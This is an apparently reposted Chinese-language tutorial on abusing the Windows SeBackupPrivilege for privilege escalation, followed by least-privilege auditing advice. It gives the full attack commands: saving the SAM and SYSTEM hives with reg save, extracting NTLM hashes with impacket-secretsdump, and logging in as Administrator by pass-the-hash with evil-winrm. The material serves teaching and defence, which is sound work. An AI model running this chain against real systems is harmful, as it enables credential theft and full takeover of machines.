文章总结： 本文深入分析了Windows系统中SeBackupPrivilege备份权限的安全风险，揭示了该权限可绕过访问控制读取敏感文件（如SAM数据库）的机制。通过实验演示了从权限检测到利用regsave提取哈希、最终通过Pass-the-Hash实现提权的完整攻击链，并强调遵循最小权限原则、定期审计用户权限分配作为核心防御措施。 综合评分： 85 文章分类： 渗透测试,内网渗透,权限提升,安全建设,漏洞分析

【提权基础入门第八节】别小瞧那个备份权限，它可能是系统里的定时炸弹

幻泉之洲

2026年4月1日 18:10 北京

SeBackupPrivilege，一个看似为备份而生的合法权限，在Windows权限管理不当的系统中，却能成为攻击者绕过所有访问控制、直达系统核心的秘密钥匙。本文带你深入理解这个权限的运作机制、检测方法以及它如何被用于权限提升攻击。

什么是 SeBackupPrivilege？

你在安全策略里可能见过这个选项：”备份文件和目录”。在Windows内部，它对应的是SeBackupPrivilege。

微软设立它的初衷很单纯：为了让备份软件能正常干活。想象一下你公司的域控制器，里面有数不清的机密文件，每个文件上都有复杂的访问控制列表，规定谁能读谁能写。现在需要做一个全盘备份，难道要手动给备份服务账户授予每一个文件的读取权限吗？显然不现实。

所以，SeBackupPrivilege就成了一个”尚方宝剑”。拥有这个特权的用户或进程，可以无视任何文件或目录上的访问控制列表，直接读取内容。

问题就出在这里。这把”尚方宝剑”如果发错了人，或者落在了不该拿的人手里，后果不堪设想。攻击者完全可以用它来窃取系统里最敏感的数据。

这个漏洞的危险性常常被低估。许多人觉得，能给用户分配这种特权的高级管理员，自己本身就已经是”上帝”了，还怕什么？但他们忘了，特权可能在继承、在批量配置时被错误地授予，或者通过其他渠道被攻击者获取。

这不是什么新奇的漏洞，但其影响持久而深远。它代表了对Windows安全模型基础——自主访问控制的一种合法旁路。

如何在实验室里复现？

想真正理解一个漏洞，最好的办法就是亲手把它搭出来再打一遍。

手动配置环境

第一步，你需要一个有管理员权限的PowerShell窗口。

创建一个测试用户，比如叫”ncv”，并设置密码：

net user ncv Passw0rd! /add

接着，把远程管理相关的服务开起来，方便后续操作。运行Enable-PSRemoting -Force，然后把这个新用户加到”远程管理用户”组里。

关键的一步来了：授予SeBackupPrivilege。这里需要一个叫Carbon的PowerShell模块来帮忙。安装并导入后，用两行命令完成授权和验证：

Grant-CPrivilege -Identity ncv -Privilege SeBackupPrivilege Test-CPrivilege -Identity ncv -Privilege SeBackupPrivilege

看到返回True，就意味着这个普通用户已经拿到了那把”尚方宝剑”。

更快的脚本化部署

如果你不想一步步敲命令，作者还准备了一个现成的PowerShell脚本SeBackupPrivilege.ps1。

用管理员身份运行它，脚本会自动完成从创建用户到授予权限的全部流程。对快速搭建测试环境来说，这非常方便。

我怎么知道自己有没有这个权限？

攻击的第一步永远是信息收集。作为防守方，你也需要知道自己的系统里有没有这种配置问题。

手动检测

最简单直接的方法，打开命令提示符，输入：

whoami /priv

在列出的特权列表中，仔细寻找”SeBackupPrivilege”。看到了，就说明你的当前账户拥有这个危险的能力。

使用工具扫描

对于规模大一点的系统，手动查就不现实了。这时可以用一些现成的工具，比如SharpUp。它是PowerSploit框架里一个很棒的工具，专门用来在Windows本地找提权路径。

运行下面的命令，让它帮你检查特权：

SharpUp.exe audit TokenPrivileges

工具会输出一份报告，清晰地告诉你，当前用户拥有哪些可能被滥用的特权，SeBackupPrivilege会赫然在列。

拿到了权限，然后呢？

现在，假设我们是一个攻击者，已经拿到了一个拥有SeBackupPrivilege的普通用户 shell。接下来就是把它变成管理员权限的时刻。

核心思路很清晰：既然我能读任何文件，那系统里最有价值的文件是什么？SAM数据库和SYSTEM注册表配置单元。这里面存放着所有本地用户的密码哈希。

1. 找个临时目录，比如C:\temp。

2. 利用特权，将SAM和SYSTEM的文件副本保存下来：

   reg save hklm\sam C:\temp\sam.hive reg save hklm\system C:\temp\system.hive

   这一步是关键。普通用户绝对无法访问这些核心系统文件，但SeBackupPrivilege让我们绕过了所有限制。

3. 把这两个.hive文件传到你的攻击机上，使用Impacket工具包里的secretsdump来提取哈希：

   impacket-secretsdump -sam sam.hive -system system.hive LOCAL

屏幕上会滚出所有本地用户的NTLM哈希，其中就包括Administrator的。

4. 拿到Administrator的哈希后，攻击就完成了。直接用Pass-the-Hash技术登录，比如用evil-winrm：

   evil-winrm -i [目标IP] -u “Administrator” -H “[提取的NTLM哈希]”

一个普通的、看起来人畜无害的用户，就这样摇身一变，成了系统的最高管理者。整个过程不需要破解任何密码，也不需要利用复杂的缓冲区溢出。

怎么防御？收紧你的权限发放

知道了攻击链条，防御就清晰了。核心原则就一条：严格遵循最小权限原则。

SeBackupPrivilege不应该被授予任何普通用户或日常使用的服务账户。它只应该分配给那些专门用于执行备份任务的、备受监控的服务账户。

检查和移除这个权限的步骤也很简单：

1. 按Win+R，输入secpol.msc打开本地安全策略。
2. 依次展开”本地策略” -> “用户权限分配”。
3. 在右侧找到”备份文件和目录”这项策略。
4. 双击打开，你会看到一个用户或组列表。仔细审查，将任何不必要的用户或组从中移除。

定期审计用户权限分配应该是安全运维的常规动作。像SeBackupPrivilege、SeRestorePrivilege、SeDebugPrivilege这类高风险特权，更是审计的重点。

说实话，Windows系统里像这样的”合法后门”还有好几个。每一个设计初衷都是为了方便管理，但每一个都可能成为攻击者眼中的突破口。安全从来不是简单地打上补丁，而是对系统每一项权限的清醒认识和严格控制。

参考：

• Microsoft官方文档：分配给新登录的特殊特权 (https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672)

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：幻泉之洲 《【提权基础入门第八节】别小瞧那个备份权限，它可能是系统里的定时炸弹》